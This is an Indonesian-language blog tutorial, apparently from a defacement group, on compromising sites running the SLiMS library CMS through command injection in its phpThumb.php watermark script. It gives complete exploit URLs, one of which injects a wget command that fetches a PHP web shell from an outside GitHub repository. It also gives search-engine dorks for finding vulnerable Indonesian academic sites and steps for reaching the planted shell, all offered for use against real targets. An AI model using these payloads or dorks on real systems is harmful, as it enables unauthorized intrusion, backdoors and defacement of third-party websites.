Header Ads Widget

Responsive Advertisement

Ticker

6/recent/ticker-posts

Deface CMS Slims command injection Upload Shell

Hai teman.

Kembali lagi bersama kami disini di blog.

Pada kesempatan kali ini saya akan memberikan tutorial bagaimana cara deface metode command injection atau bisa dibilang ( koman injeksi ).


command injection ini, Tidak jauh beda dengan remote code execution. Kita hanya perlu memberikan command evil ( seperti wget ) guna untuk mengupload file evil ( shell backdoor ) dari luar.

untuk bahan bahan nya kalian bisa ambil dibawah sini.

Exploit:
/lib/watermark/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg%20;wget%20https://raw.githubusercontent.com/backdoorhub/shell-backdoor-list/master/shell/php/mini.php;%20&phpThumbDebug=9
Jadi gini tanda² klw Shell nya berhasil di upload itu gaada :v
Jadi klean cek² aja 
Dork:
inurl:/index.php?p=show_
detail&id= "Detail Cantuman" site:ac.id
"Powered By Slims7" site:ac.id
Sumber:
https://exploit.zone-dark.com/multiple-web-vulnerablities-pada-slims7-rce-xss-csrf/

 Saya rasa bahanya sudah cukup juga tersedia mari kita mencari target nya hehe.

                                                                                            

Untuk awalan mari kita dorking terlebih dahulu bisa dilihat banyak sekali disana targetnya kan, Jika susah mencari website target yang vuln kalian kembangkan dorknya supaya fresh agar juga websitenya vuln.

                                            


Disini saya memilih satu target yang menurut saya vuln untuk dilakukan command injection.

Tidak perlu berlama lama lagi langsung saja kalian masukan exploit diatas kalian ganti terlebih dahulu exploit yang ada link github shell nya jadi ls -la untuk mengecek apakah website tersebut vuln atau tidak.

                                          

Jika vuln maka akan jadi seperti ini, Jika sudah seperti ini silahkan kalian masukan lagi exploitnya, Ganti kembali exploit yang tadi ls -la menjadi wget seperti diatas contohnya seperti ini.


Exploit untuk cek vuln atau tidak :

/lib/watermark/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg%20;ls -la;%20&phpThumbDebug=9

Exploit untuk upload shell

/lib/watermark/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg%20;wget%20https://raw.githubusercontent.com/backdoorhub/shell-backdoor-list/master/shell/php/mini.php;%20&phpThumbDebug=9

Sekarang kita beri exploit upload shellnya 

                             

Setelah kita memberikan exploit upload shellnya maka tidak akan terjadi apa apa alias tidak ada perubahan tampilan akan tetap sama seperti diatas tadi pas mengecek vuln atau tidaknya.


Jika sudah kalian langsung akses saja shell nya, Karna nama shell nya dari repository github adalah mini.php sekarang kita akses dengan cara memasukan path seperti ini

lib/watermark/mini.php



                                   



Maka akan automatis kita masuk kedalam shell nya oke. 

Done kita menanam shellnya, Mudah bukan? oke mungkin sekian untuk tutorial kali ini.

Untuk penutup saya ucapkan Wassalamualaikum Wr Wb.


Powered by MR.Donut's & Jakarta Blackhat

Posting Komentar

0 Komentar